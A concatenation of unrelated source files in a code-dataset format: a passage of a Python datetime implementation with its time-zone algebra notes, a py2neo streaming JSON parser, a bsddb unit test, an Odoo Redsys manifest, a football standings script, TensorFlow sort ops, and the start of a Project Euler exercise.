y, m, d, hh, mm, ss, us = _normalize_datetime(
self._year,
self._month,
self._day + other.days * factor,
self._hour,
self._minute,
self._second + other.seconds * factor,
self._microsecond + other.microseconds * factor)
return datetime(y, m, d, hh, mm, ss, us, tzinfo=self._tzinfo)
def __add__(self, other):
"Add a datetime and a timedelta."
if not isinstance(other, timedelta):
return NotImplemented
return self._add_timedelta(other, 1)
__radd__ = __add__
def __sub__(self, other):
"Subtract two datetimes, or a datetime and a timedelta."
if not isinstance(other, datetime):
if isinstance(other, timedelta):
return self._add_timedelta(other, -1)
return NotImplemented
delta_d = self.toordinal() - other.toordinal()
delta_s = (self._hour - other._hour) * 3600 + \
(self._minute - other._minute) * 60 + \
(self._second - other._second)
delta_us = self._microsecond - other._microsecond
base = timedelta._create(delta_d, delta_s, delta_us, True)
if self._tzinfo is other._tzinfo:
return base
myoff = self._utcoffset()
otoff = other._utcoffset()
if myoff == otoff:
return base
if myoff is None or otoff is None:
raise TypeError("can't subtract offset-naive and offset-aware datetimes")
return base + timedelta(minutes = otoff-myoff)
def __hash__(self):
if self._hashcode == -1:
tzoff = self._utcoffset()
if tzoff is None:
self._hashcode = hash(self._getstate()[0])
else:
days = _ymd2ord(self.year, self.month, self.day)
seconds = self.hour * 3600 + (self.minute - tzoff) * 60 + self.second
self._hashcode = hash(timedelta(days, seconds, self.microsecond))
return self._hashcode
# Pickle support.
def _getstate(self):
yhi, ylo = divmod(self._year, 256)
us2, us3 = divmod(self._microsecond, 256)
us1, us2 = divmod(us2, 256)
basestate = _struct.pack('10B', yhi, ylo, self._month, self._day,
self._hour, self._minute, self._second,
us1, us2, us3)
if self._tzinfo is None:
return (basestate,)
else:
return (basestate, self._tzinfo)
def __setstate(self, string, tzinfo):
if tzinfo is not None and not isinstance(tzinfo, _tzinfo_class):
raise TypeError("bad tzinfo state arg")
(yhi, ylo, self._month, self._day, self._hour,
self._minute, self._second, us1, us2, us3) = (ord(string[0]),
ord(string[1]), ord(string[2]), ord(string[3]),
ord(string[4]), ord(string[5]), ord(string[6]),
ord(string[7]), ord(string[8]), ord(string[9]))
self._year = yhi * 256 + ylo
self._microsecond = (((us1 << 8) | us2) << 8) | us3
self._tzinfo = tzinfo
def __reduce__(self):
return (self.__class__, self._getstate())
datetime.min = datetime(1, 1, 1)
datetime.max = datetime(9999, 12, 31, 23, 59, 59, 999999)
datetime.resolution = timedelta(microseconds=1)
def _isoweek1monday(year):
# Helper to calculate the day number of the Monday starting week 1
# XXX This could be done more efficiently
THURSDAY = 3
firstday = _ymd2ord(year, 1, 1)
firstweekday = (firstday + 6) % 7 # See weekday() above
week1monday = firstday - firstweekday
if firstweekday > THURSDAY:
week1monday += 7
return week1monday
"""
Some time zone algebra. For a datetime x, let
x.n = x stripped of its timezone -- its naive time.
x.o = x.utcoffset(), and assuming that doesn't raise an exception or
return None
x.d = x.dst(), and assuming that doesn't raise an exception or
return None
x.s = x's standard offset, x.o - x.d
Now some derived rules, where k is a duration (timedelta).
1. x.o = x.s + x.d
This follows from the definition of x.s.
2. If x and y have the same tzinfo member, x.s = y.s.
This is actually a requirement, an assumption we need to make about
sane tzinfo classes.
3. The naive UTC time corresponding to x is x.n - x.o.
This is again a requirement for a sane tzinfo class.
4. (x+k).s = x.s
This follows from #2, and that datimetimetz+timedelta preserves tzinfo.
5. (x+k).n = x.n + k
Again follows from how arithmetic is defined.
Now we can explain tz.fromutc(x). Let's assume it's an interesting case
(meaning that the various tzinfo methods exist, and don't blow up or return
None when called).
The function wants to return a datetime y with timezone tz, equivalent to x.
x is already in UTC.
By #3, we want
y.n - y.o = x.n [1]
The algorithm starts by attaching tz to x.n, and calling that y. So
x.n = y.n at the start. Then it wants to add a duration k to y, so that [1]
becomes true; in effect, we want to solve [2] for k:
(y+k).n - (y+k).o = x.n [2]
By #1, this is the same as
(y+k).n - ((y+k).s + (y+k).d) = x.n [3]
By #5, (y+k).n = y.n + k, which equals x.n + k because x.n=y.n at the start.
Substituting that into [3],
x.n + k - (y+k).s - (y+k).d = x.n; the x.n terms cancel, leaving
k - (y+k).s - (y+k).d = 0; rearranging,
k = (y+k).s - (y+k).d; by #4, (y+k).s == y.s, so
k = y.s - (y+k).d
On the RHS, (y+k).d can't be computed directly, but y.s can be, and we
approximate k by ignoring the (y+k).d term at first. Note that k can't be
very large, since all offset-returning methods return a duration of magnitude
less than 24 hours. For that reason, if y is firmly in std time, (y+k).d must
be 0, so ignoring it has no consequence then.
In any case, the new value is
z = y + y.s [4]
It's helpful to step back at look at [4] from a higher level: it's simply
mapping from UTC to tz's standard time.
At this point, if
z.n - z.o = x.n [5]
we have an equivalent time, and are almost done. The insecurity here is
at the start of daylight time. Picture US Eastern for concreteness. The wall
time jumps from 1:59 to 3:00, and wall hours of the form 2:MM don't make good
sense then. The docs ask that an Eastern tzinfo class consider such a time to
be EDT (because it's "after 2"), which is a redundant spelling of 1:MM EST
on the day DST starts. We want to return the 1:MM EST spelling because that's
the only spelling that makes sense on the local wall clock.
In fact, if [5] holds at this point, we do have the standard-time spelling,
but that takes a bit of proof. We first prove a stronger result. What's the
difference between the LHS and RHS of [5]? Let
diff = x.n - (z.n - z.o) [6]
Now
z.n = by [4]
(y + y.s).n = by #5
y.n + y.s = since y.n = x.n
x.n + y.s = since z and y are have the same tzinfo member,
y.s = z.s by #2
x.n + z.s
Plugging that back into [6] gives
diff =
x.n - ((x.n + z.s) - z.o) = expanding
x.n - x.n - z.s + z.o = cancelling
- z.s + z.o = by #2
z.d
So diff = z.d.
If [5] is true now, diff = 0, so z.d = 0 too, and we have the standard-time
spelling we wanted in the endcase described above. We're done. Contrarily,
if z.d = 0, then we have a UTC equivalent, and are also done.
If [5] is not true now, diff = z.d != 0, and z.d is the offset we need to
add to z (in effect, z is in tz's standard time, and we need to shift the
local clock into tz's daylight time).
Let
z' = z + z.d = z + diff [7]
and we can again ask whether
z'.n - z'.o = x.n [8]
If so, we're done. If not, the tzinfo class is insane, according to the
assumptions we've made. This also requires a bit of proof. As before, let's
compute the difference between the LHS and RHS of [8] (and skipping some of
the justifications for the kinds of substitutions we've done several times
already):
diff' = x.n - (z'.n - z'.o) = replacing z'.n via [7]
x.n - (z.n + diff - z'.o) = replacing diff via [6]
x.n - (z.n + x.n - (z.n - z.o) - z'.o) =
x.n - z.n - x.n + z.n - z.o + z'.o = cancel x.n
- z.n + z.n - z.o + z'.o = cancel z.n
- z.o + z'.o = #1 twice
-z.s - z.d + z'.s + z'.d = z and z' have same tzinfo
z'.d - z.d
So z' is UTC-equivalent to x iff z'.d = z.d at this point. If they are equal,
we've found the UTC-equivalent so are done. In fact, we stop with [7] and
return z', not bothering to compute z'.d.
How could z.d and z'd differ? z' = z + z.d [7], so merely moving z' by
a dst() offset, and starting *from* a time already in DST (we know z.d != 0),
would have to change the result dst() returns: we start in DST, and moving
a little further into it takes us out of DST.
There isn't a sane case where this can happen. The closest it gets is at
the end of DST, where there's an hour in UTC with no spelling in a hybrid
tzinfo class. In US Eastern, that's 5:MM UTC = 0:MM EST = 1:MM EDT. During
that hour, on an Eastern clock 1:MM is taken as being in standard time (6:MM
UTC) because the docs insist on that, but 0:MM is taken as being in daylight
time (4:MM UTC). There is no local time mapping to 5:MM UTC. The local
clock jumps from 1:59 back to 1:00 again, and repeats the 1:MM hour in
standard time. Since that's what the local clock *does*, we want to map both
UTC hours 5:MM and 6:MM to 1:MM Eastern. The result is ambiguous
in local time, but so it goes -- it's the way the local clock works.
When x = 5:MM UTC is the input to this algorithm, x.o=0, y.o=-5 and y.d=0,
so z=0:MM. z.d=60 (minutes) then, so [5] doesn't hold and we keep going.
z' = z + z.d = 1:MM then, and z'.d=0, and z'.d - z.d = -60 != 0 so [8]
(correctly) concludes that z' is not UTC-equivalent to x.
Because we know z.d said z was in daylight time (else [5] would have held and
we would have stopped then), and we know z.d != z'.d (else [8] would have held
and we have stopped then), and there are only 2 possible values dst() can
return in Eastern, it follows that z'.d must be 0 (which it is in the example,
but the reasoning doesn't depend on the example -- it depends on there being
two possible dst() outcomes, one zero and the other non-zero). Therefore
z' must be in standard time, and is the spelling we want in this case.
Note again that z' is not UTC-equivalent as far as the hybrid tzinfo class is
concerned (because it takes z' as being in standard time rather than the
daylight time we intend here), but returning it gives the real-life "local
clock repeats an hour" behavior when mapping the "unspellable" UTC hour into
tz.
When the input is 6:MM, z=1:MM and z.d=0, and we stop at once, again with
the 1:MM standard time spelling we want.
So how can this break? One of the assumptions must be violated. Two
possibilities:
1) [2] effectively says that y.s is invariant across all y belong to a given
time zone. This isn't true if, for political reasons or continental drift,
a region decides to change its base offset from UTC.
2) There may be versions of "double daylight" time where the tail end of
the analysis gives up a step too early. I haven't thought about that
enough to say.
In any case, it's clear that the default fromutc() is strong enough to handle
"almost all" time zones: so long as the standard offset is invariant, it
doesn't matter if daylight time transition points change from year to year, or
if daylight time is skipped in some years; it doesn't matter how large or
small dst() may get within its bounds; and it doesn't even matter if some
perverse time zone returns a negative dst()). So a breaking case must be
pretty bizarre, and a tzinfo subclass can override fromutc() if it is.
"""
|
bestvibes/neo4j-social-network | refs/heads/master | env/lib/python2.7/site-packages/py2neo/packages/jsonstream/pyjsonstream.py | 4 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2012-2014 Nigel Small
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Incremental JSON parser.
"""
from __future__ import unicode_literals
try:
from builtins import chr as _chr
except ImportError:
from __builtin__ import unichr as _chr
from itertools import groupby
from string import digits, whitespace
__all__ = ["JSONStream", "assembled", "grouped"]
class AwaitingData(BaseException):
""" Raised when data is temporarily unavailable.
"""
def __init__(self, *args, **kwargs):
super(AwaitingData, self).__init__(*args, **kwargs)
class EndOfStream(BaseException):
""" Raised when stream is exhausted.
"""
def __init__(self, *args, **kwargs):
super(EndOfStream, self).__init__(*args, **kwargs)
class UnexpectedCharacter(ValueError):
""" Raised when a unexpected character is encountered.
"""
def __init__(self, *args, **kwargs):
super(UnexpectedCharacter, self).__init__(*args, **kwargs)
class TextStream:
def __init__(self):
self.__data = []
self.__current_line = 0
self.__current_char = 0
self.__writable = True
self.__marked_line = 0
self.__marked_char = 0
def close(self):
self.__writable = False
def peek(self):
if self.__current_line < len(self.__data):
line = self.__data[self.__current_line]
if self.__current_char < len(line):
return line[self.__current_char]
else:
# no more characters on this line, jump to the next
self.__current_line += 1
self.__current_char = 0
if self.__current_line < len(self.__data):
return self.__data[self.__current_line][self.__current_char]
if self.__writable:
raise AwaitingData()
else:
raise EndOfStream()
def read(self):
if self.__current_line < len(self.__data):
line = self.__data[self.__current_line]
if self.__current_char < len(line):
ch = line[self.__current_char]
self.__current_char += 1
return ch
else:
self.__current_line += 1
if self.__current_line < len(self.__data):
self.__current_char = 1
return self.__data[self.__current_line][0]
else:
self.__current_char = 0
if self.__writable:
raise AwaitingData()
else:
raise EndOfStream()
def read_any(self, allowed):
out = []
start = self.__current_char
while True:
if self.__current_line < len(self.__data):
line = self.__data[self.__current_line]
if self.__current_char < len(line):
ch = self.__data[self.__current_line][self.__current_char]
if ch in allowed:
# move forward
self.__current_char += 1
else:
# return everything between start and here
out.append(line[start:self.__current_char])
return "".join(out)
else:
# no more characters on this line
out.append(line[start:])
self.__current_line += 1
self.__current_char = 0
start = 0
elif self.__writable:
raise AwaitingData()
else:
return "".join(out)
#def read_until(self, marker):
# out = []
# line = self.__current_line
# start = self.__current_char
# while True:
# try:
# end = self.__data[line].index(marker, start)
# except IndexError: # no more lines
# if self.__writable:
# raise AwaitingData()
# else:
# raise EndOfStream()
# except ValueError: # not found
# out.append(self.__data[line][start:])
# line += 1
# start = 0
# else:
# # found
# self.__current_line = line
# self.__current_char = end + 1
# out.append(self.__data[line][start:self.__current_char])
# return "".join(out)
def read_until_any(self, markers):
out = []
line = self.__current_line
start = self.__current_char
while True:
if line < len(self.__data):
try:
end = min(pos
for pos in [self.__data[line].find(marker, start)
for marker in markers]
if pos >= 0)
except ValueError: # not found
out.append(self.__data[line][start:])
line += 1
start = 0
else:
# found
self.__current_line = line
self.__current_char = end + 1
out.append(self.__data[line][start:self.__current_char])
return "".join(out)
elif self.__writable:
raise AwaitingData()
else:
raise EndOfStream()
def peek_after_any(self, markers):
"""
skips any characters in the marker set and returns a peek of the next
"""
while True:
if self.__current_line < len(self.__data):
line = self.__data[self.__current_line]
if self.__current_char < len(line):
ch = self.__data[self.__current_line][self.__current_char]
if ch in markers:
# skip
self.__current_char += 1
else:
# peek
return ch
else:
# no more characters on this line
self.__current_line += 1
self.__current_char = 0
elif self.__writable:
raise AwaitingData()
else:
raise EndOfStream()
def write(self, data):
if not self.__writable:
raise IOError("Stream is not writable")
if data:
# so we can guarantee no line is empty
self.__data.append(data)
def mark(self):
self.__marked_line = self.__current_line
self.__marked_char = self.__current_char
def undo(self):
self.__current_line = self.__marked_line
self.__current_char = self.__marked_char
class Tokeniser(object):
def __init__(self):
self.__text = TextStream()
def close(self):
self.__text.close()
def write(self, data):
"""Write raw JSON data to the decoder stream.
"""
self.__text.write(data)
def _read_literal(self, literal):
self.__text.mark()
try:
for expected in literal:
actual = self.__text.read()
if actual != expected:
raise UnexpectedCharacter(actual)
except AwaitingData:
self.__text.undo()
raise
return literal
def _read_string(self):
self.__text.mark()
try:
src, value = [self._read_literal('"')], []
while True:
chunk = self.__text.read_until_any(('"', '\\'))
src.append(chunk)
value.append(chunk[:-1])
if chunk.endswith('\\'):
ch = self.__text.read()
src.append(ch)
if ch in '"/\\':
value.append(ch)
elif ch == 'b':
value.append('\b')
elif ch == 'f':
value.append('\f')
elif ch == 'n':
value.append('\n')
elif ch == 'r':
value.append('\r')
elif ch == 't':
value.append('\t')
elif ch == 'u':
n = 0
for i in range(4):
ch = self.__text.read()
src.append(ch)
n = 16 * n + int(ch, 16)
value.append(_chr(n))
else:
raise UnexpectedCharacter(ch)
else:
return "".join(src), "".join(value)
except AwaitingData:
self.__text.undo()
raise
def _read_number(self):
src = []
has_fractional_part = False
has_exponent = False
self.__text.mark()
try:
# check for sign
ch = self.__text.read_any("-")
if ch:
src.append(ch)
# read integer part
src.append(self.__text.read_any(digits))
# read fractional part
ch = self.__text.read_any(".")
if ch:
has_fractional_part = True
src.append(ch)
src.append(self.__text.read_any(digits))
# read exponent
ch = self.__text.read_any('Ee')
if ch:
has_exponent = True
src.append(ch)
ch = self.__text.read_any('+-')
if ch:
src.append(ch)
src.append(self.__text.read_any(digits))
except AwaitingData:
# number potentially incomplete: need to wait for
# further data or end of stream
self.__text.undo()
raise
str_src = "".join(src)
if has_fractional_part or has_exponent:
return str_src, float(str_src)
else:
return str_src, int(str_src)
def read_token(self):
""" Read token
"""
ch = self.__text.peek_after_any(whitespace)
if ch in ',:[]{}':
return self.__text.read(), None
if ch == '"':
return self._read_string()
if ch in '0123456789+-':
return self._read_number()
if ch == 't':
return self._read_literal("true"), True
if ch == 'f':
return self._read_literal("false"), False
if ch == 'n':
return self._read_literal("null"), None
raise UnexpectedCharacter(ch)
# Token constants used for expectation management
VALUE = 0x01
OPEN_BRACKET = 0x02
CLOSE_BRACKET = 0x04
OPEN_BRACE = 0x08
CLOSE_BRACE = 0x10
COMMA = 0x20
COLON = 0x40
VALUE_OR_OPEN = VALUE | OPEN_BRACKET | OPEN_BRACE
VALUE_BRACKET_OR_OPEN_BRACE = VALUE | OPEN_BRACKET | CLOSE_BRACKET | OPEN_BRACE
COMMA_OR_CLOSE_BRACKET = COMMA | CLOSE_BRACKET
COMMA_OR_CLOSE_BRACE = COMMA | CLOSE_BRACE
VALUE_OR_CLOSE_BRACE = VALUE | CLOSE_BRACE
class JSONStream(object):
""" Streaming JSON decoder. This class both expects Unicode input and will
produce Unicode output.
"""
def __init__(self, source):
self.tokeniser = Tokeniser()
self.source = iter(source)
self.path = []
self._expectation = VALUE_OR_OPEN
def _in_array(self):
return self.path and isinstance(self.path[-1], int)
def _in_object(self):
return self.path and not isinstance(self.path[-1], int)
def __iter__(self):
while True:
try:
try:
self.tokeniser.write(next(self.source))
except StopIteration:
self.tokeniser.close()
while True:
try:
src, value = self.tokeniser.read_token()
if src == ',':
if not self._expectation & COMMA:
raise UnexpectedCharacter(",")
self._expectation = VALUE_OR_OPEN
elif src == ':':
if not self._expectation & COLON:
raise UnexpectedCharacter(":")
self._expectation = VALUE_OR_OPEN
elif src == '[':
yield tuple(self.path), []
if not self._expectation & OPEN_BRACKET:
raise UnexpectedCharacter("[")
self.path.append(0)
self._expectation = VALUE_BRACKET_OR_OPEN_BRACE
elif src == ']':
if not self._expectation & CLOSE_BRACKET:
raise UnexpectedCharacter("]")
self.path.pop()
if self._in_array():
self.path[-1] += 1
self._expectation = COMMA_OR_CLOSE_BRACKET
elif self._in_object():
self.path[-1] = None
self._expectation = COMMA_OR_CLOSE_BRACE
else:
self._expectation = VALUE_OR_OPEN
elif src == '{':
yield tuple(self.path), {}
if not self._expectation & OPEN_BRACE:
raise UnexpectedCharacter("{")
self.path.append(None)
self._expectation = VALUE_OR_CLOSE_BRACE
elif src == '}':
if not self._expectation & CLOSE_BRACE:
raise UnexpectedCharacter("}")
self.path.pop()
if self._in_array():
self.path[-1] += 1
self._expectation = COMMA_OR_CLOSE_BRACKET
elif self._in_object():
self.path[-1] = None
self._expectation = COMMA_OR_CLOSE_BRACE
else:
self._expectation = VALUE_OR_OPEN
else:
if not self._expectation & VALUE:
raise UnexpectedCharacter(src)
if self._in_array():
# array value
yield tuple(self.path), value
self.path[-1] += 1
self._expectation = COMMA_OR_CLOSE_BRACKET
elif self._in_object():
if self.path[-1] is None:
# object key (no yield)
self.path[-1] = value
self._expectation = COLON
else:
# object value
yield tuple(self.path), value
self.path[-1] = None
self._expectation = COMMA_OR_CLOSE_BRACE
else:
# simple value
yield tuple(self.path), value
except AwaitingData:
break
except EndOfStream:
break
def _merged(obj, key, value):
""" Returns object with value merged at a position described by iterable
key. The key describes a navigable path through the object hierarchy with
integer items describing list indexes and other types of items describing
dictionary keys.
>>> obj = None
>>> obj = _merged(obj, ("drink",), "lemonade")
>>> obj
{'drink': 'lemonade'}
>>> obj = _merged(obj, ("cutlery", 0), "knife")
>>> obj = _merged(obj, ("cutlery", 1), "fork")
>>> obj = _merged(obj, ("cutlery", 2), "spoon")
>>> obj
{'cutlery': ['knife', 'fork', 'spoon'], 'drink': 'lemonade'}
"""
if key:
k = key[0]
if isinstance(k, int):
if isinstance(obj, list):
obj = list(obj)
else:
obj = []
while len(obj) <= k:
obj.append(None)
else:
if isinstance(obj, dict):
obj = dict(obj)
else:
obj = {}
obj.setdefault(k, None)
obj[k] = _merged(obj[k], key[1:], value)
return obj
else:
return value
def assembled(iterable):
""" Returns a JSON-derived value from a set of key-value pairs as produced
by the JSONStream process. This operates in a similar way to the built-in
`dict` function. Internally, this uses the `merged` function on each pair
to build the return value.
>>> data = [
... (("drink",), "lemonade"),
... (("cutlery", 0), "knife"),
... (("cutlery", 1), "fork"),
... (("cutlery", 2), "spoon"),
... ]
>>> assembled(data)
{'cutlery': ['knife', 'fork', 'spoon'], 'drink': 'lemonade'}
:param iterable: key-value pairs to be merged into assembled value
"""
obj = None
for key, value in iterable:
obj = _merged(obj, key, value)
return obj
def _group(iterable, level):
for key, value in iterable:
yield key[level:], value
def grouped(iterable, level=1):
def _group_key(item):
key, value = item
if len(key) >= level:
return key[0:level]
else:
return None
for key, value in groupby(iterable, _group_key):
if key is not None:
yield key, _group(value, level)
|
fkolacek/FIT-VUT | refs/heads/master | bp-revok/python/lib/python2.7/bsddb/test/test_compat.py | 5 | """
Test cases adapted from the test_bsddb.py module in Python's
regression test suite.
"""
import os, string
import unittest
from test_all import db, hashopen, btopen, rnopen, verbose, \
get_new_database_path
class CompatibilityTestCase(unittest.TestCase):
def setUp(self):
self.filename = get_new_database_path()
def tearDown(self):
try:
os.remove(self.filename)
except os.error:
pass
def test01_btopen(self):
self.do_bthash_test(btopen, 'btopen')
def test02_hashopen(self):
self.do_bthash_test(hashopen, 'hashopen')
def test03_rnopen(self):
data = "The quick brown fox jumped over the lazy dog.".split()
if verbose:
print "\nTesting: rnopen"
f = rnopen(self.filename, 'c')
for x in range(len(data)):
f[x+1] = data[x]
getTest = (f[1], f[2], f[3])
if verbose:
print '%s %s %s' % getTest
self.assertEqual(getTest[1], 'quick', 'data mismatch!')
rv = f.set_location(3)
if rv != (3, 'brown'):
self.fail('recno database set_location failed: '+repr(rv))
f[25] = 'twenty-five'
f.close()
del f
f = rnopen(self.filename, 'w')
f[20] = 'twenty'
def noRec(f):
rec = f[15]
self.assertRaises(KeyError, noRec, f)
def badKey(f):
rec = f['a string']
self.assertRaises(TypeError, badKey, f)
del f[3]
rec = f.first()
while rec:
if verbose:
print rec
try:
rec = f.next()
except KeyError:
break
f.close()
def test04_n_flag(self):
f = hashopen(self.filename, 'n')
f.close()
def do_bthash_test(self, factory, what):
if verbose:
print '\nTesting: ', what
f = factory(self.filename, 'c')
if verbose:
print 'creation...'
# truth test
if f:
if verbose: print "truth test: true"
else:
if verbose: print "truth test: false"
f['0'] = ''
f['a'] = 'Guido'
f['b'] = 'van'
f['c'] = 'Rossum'
f['d'] = 'invented'
# 'e' intentionally left out
f['f'] = 'Python'
if verbose:
print '%s %s %s' % (f['a'], f['b'], f['c'])
if verbose:
print 'key ordering...'
start = f.set_location(f.first()[0])
if start != ('0', ''):
self.fail("incorrect first() result: "+repr(start))
while 1:
try:
rec = f.next()
except KeyError:
self.assertEqual(rec, f.last(), 'Error, last <> last!')
f.previous()
break
if verbose:
print rec
self.assert_(f.has_key('f'), 'Error, missing key!')
# test that set_location() returns the next nearest key, value
# on btree databases and raises KeyError on others.
if factory == btopen:
e = f.set_location('e')
if e != ('f', 'Python'):
self.fail('wrong key,value returned: '+repr(e))
else:
try:
e = f.set_location('e')
except KeyError:
pass
else:
self.fail("set_location on non-existent key did not raise KeyError")
f.sync()
f.close()
# truth test
try:
if f:
if verbose: print "truth test: true"
else:
if verbose: print "truth test: false"
except db.DBError:
pass
else:
self.fail("Exception expected")
del f
if verbose:
print 'modification...'
f = factory(self.filename, 'w')
f['d'] = 'discovered'
if verbose:
print 'access...'
for key in f.keys():
word = f[key]
if verbose:
print word
def noRec(f):
rec = f['no such key']
self.assertRaises(KeyError, noRec, f)
def badKey(f):
rec = f[15]
self.assertRaises(TypeError, badKey, f)
f.close()
#----------------------------------------------------------------------
def test_suite():
return unittest.makeSuite(CompatibilityTestCase)
if __name__ == '__main__':
unittest.main(defaultTest='test_suite')
|
factorlibre/l10n-spain | refs/heads/8.0 | payment_redsys/__openerp__.py | 10 | # -*- coding: utf-8 -*-
{
'name': 'Redsys Payment Acquirer',
'category': 'Hidden',
'summary': 'Payment Acquirer: Redsys Implementation',
'version': '8.0.1.0.2',
'author': "Incaser Informatica S.L.,Odoo Community Association (OCA)",
'depends': ['payment'],
"external_dependencies": {
"python": [
"Crypto.Cipher.DES3",
],
"bin": [],
},
'data': [
'views/redsys.xml',
'views/payment_acquirer.xml'
],
'license': 'AGPL-3',
'installable': True,
}
|
marquirj/ProyectoSkull | refs/heads/master | bot/contenedores.py | 1 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
equiposPuntos = [("Chiclana C.F", 25), ("Trebujena C.F", 25), ("Jerez Industrial C.F.", 21), ("Bazan", 20), ("Balon de Cadiz", 20), ("U.D. Villamartin", 17), ("C.D. Vejer", 15), ("Portuense C.F.", 14), ("SanFer Isleño", 14), ("Roteña", 12), ("U.D. Tesorillo", 12), ("Juventud Sanluqueña", 11), ("Rayo Sanluqueño C.D.", 10), ("Jedula C.D.", 8), ("C.D. Guadiaro", 6), ("Chipiona", 3), ("El Torno 2009", 6), ("San Jose Obrero U.D.", 5)]
def getClasificacion():
equiposPuntos.sort(key=lambda puntos: puntos[1], reverse=True)
return equiposPuntos
|
jalexvig/tensorflow | refs/heads/master | tensorflow/contrib/framework/python/ops/sort_ops.py | 27 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Support for sorting tensors.
@@argsort
@@sort
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import ops as framework_ops
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_ops
def sort(values, axis=-1, direction='ASCENDING', name=None):
"""Sorts a tensor.
Args:
values: 1-D or higher numeric `Tensor`.
axis: The axis along which to sort. The default is -1, which sorts the last
axis.
direction: The direction in which to sort the values (`'ASCENDING'` or
`'DESCENDING'`).
name: Optional name for the operation.
Returns:
A `Tensor` with the same dtype and shape as `values`, with the elements
sorted along the given `axis`.
Raises:
ValueError: If axis is not a constant scalar, or the direction is invalid.
"""
with framework_ops.name_scope(name, 'sort'):
return _sort_or_argsort(values, axis, direction, return_argsort=False)
def argsort(values, axis=-1, direction='ASCENDING', stable=False, name=None):
"""Returns the indices of a tensor that give its sorted order along an axis.
For a 1D tensor, `tf.gather(values, tf.argsort(values))` is equivalent to
`tf.sort(values)`. For higher dimensions, the output has the same shape as
`values`, but along the given axis, values represent the index of the sorted
element in that slice of the tensor at the given position.
Args:
values: 1-D or higher numeric `Tensor`.
axis: The axis along which to sort. The default is -1, which sorts the last
axis.
direction: The direction in which to sort the values (`'ASCENDING'` or
`'DESCENDING'`).
stable: If True, equal elements in the original tensor will not be
re-ordered in the returned order. Unstable sort is not yet implemented,
but will eventually be the default for performance reasons. If you
require a stable order, pass `stable=True` for forwards compatibility.
name: Optional name for the operation.
Returns:
An int32 `Tensor` with the same shape as `values`. The indices that would
sort each slice of the given `values` along the given `axis`.
Raises:
ValueError: If axis is not a constant scalar, or the direction is invalid.
"""
del stable # Unused.
with framework_ops.name_scope(name, 'argsort'):
return _sort_or_argsort(values, axis, direction, return_argsort=True)
def _sort_or_argsort(values, axis, direction, return_argsort):
"""Internal sort/argsort implementation.
Args:
values: The input values.
axis: The axis along which to sort.
direction: 'ASCENDING' or 'DESCENDING'.
return_argsort: Whether to return the argsort result.
Returns:
Either the sorted values, or the indices of the sorted values in the
original tensor. See the `sort` and `argsort` docstrings.
Raises:
ValueError: If axis is not a constant scalar, or the direction is invalid.
"""
if direction not in _SORT_IMPL:
raise ValueError('%s should be one of %s' %
(direction, ', '.join(sorted(_SORT_IMPL.keys()))))
# Axis must be an integer, not a Tensor.
axis = framework_ops.convert_to_tensor(axis, name='axis')
axis_static = tensor_util.constant_value(axis)
if axis.shape.ndims != 0 or axis_static is None:
raise ValueError('axis must be a constant scalar')
axis_static = int(axis_static) # Avoids NumPy casting error
values = framework_ops.convert_to_tensor(values, name='values')
return _SORT_IMPL[direction](values, axis_static, return_argsort)
def _descending_sort(values, axis, return_argsort=False):
"""Sorts values in reverse using `top_k`.
Args:
values: Tensor of numeric values.
axis: Index of the axis which values should be sorted along.
return_argsort: If False, return the sorted values. If True, return the
indices that would sort the values.
Returns:
The sorted values.
"""
k = array_ops.shape(values)[axis]
rank = array_ops.rank(values)
static_rank = values.shape.ndims
# Fast path: sorting the last axis.
if axis == -1 or axis + 1 == values.get_shape().ndims:
top_k_input = values
transposition = None
else:
# Otherwise, transpose the array. Swap axes `axis` and `rank - 1`.
if axis < 0:
# Calculate the actual axis index if counting from the end. Use the static
# rank if available, or else make the axis back into a tensor.
axis += static_rank or rank
if static_rank is not None:
# Prefer to calculate the transposition array in NumPy and make it a
# constant.
transposition = constant_op.constant(
np.r_[
# Axes up to axis are unchanged.
np.arange(axis),
# Swap axis and rank - 1.
[static_rank - 1],
# Axes in [axis + 1, rank - 1) are unchanged.
np.arange(axis + 1, static_rank - 1),
# Swap axis and rank - 1.
[axis]],
name='transposition')
else:
# Generate the transposition array from the tensors.
transposition = array_ops.concat(
[
# Axes up to axis are unchanged.
math_ops.range(axis),
# Swap axis and rank - 1.
[rank - 1],
# Axes in [axis + 1, rank - 1) are unchanged.
math_ops.range(axis + 1, rank - 1),
# Swap axis and rank - 1.
[axis]
],
axis=0)
top_k_input = array_ops.transpose(values, transposition)
values, indices = nn_ops.top_k(top_k_input, k)
return_value = indices if return_argsort else values
if transposition is not None:
# transposition contains a single cycle of length 2 (swapping 2 elements),
# so it is an involution (it is its own inverse).
return_value = array_ops.transpose(return_value, transposition)
return return_value
def _ascending_sort(values, axis, return_argsort=False):
# Negate the values to get the ascending order from descending sort.
values_or_indices = _descending_sort(-values, axis, return_argsort)
# If not argsort, negate the values again.
return values_or_indices if return_argsort else -values_or_indices
_SORT_IMPL = {
'ASCENDING': _ascending_sort,
'DESCENDING': _descending_sort,
}
|
drcsturm/project-euler | refs/heads/master | p033.py | 1 |
# The fraction 49/98 is a curious fraction, as an inexperienced mathematician in attempting to simplify it may incorrectly believe that 49/98 = 4/8, which is correct, is obtained by cancelling the 9s.
# We shall consider fractions like, 30/50 = 3/5, to be trivial examples.
# There are exactly four non-trivial examples of this type of fraction, less than one in value, and containing two digits in the numerator and denominator.
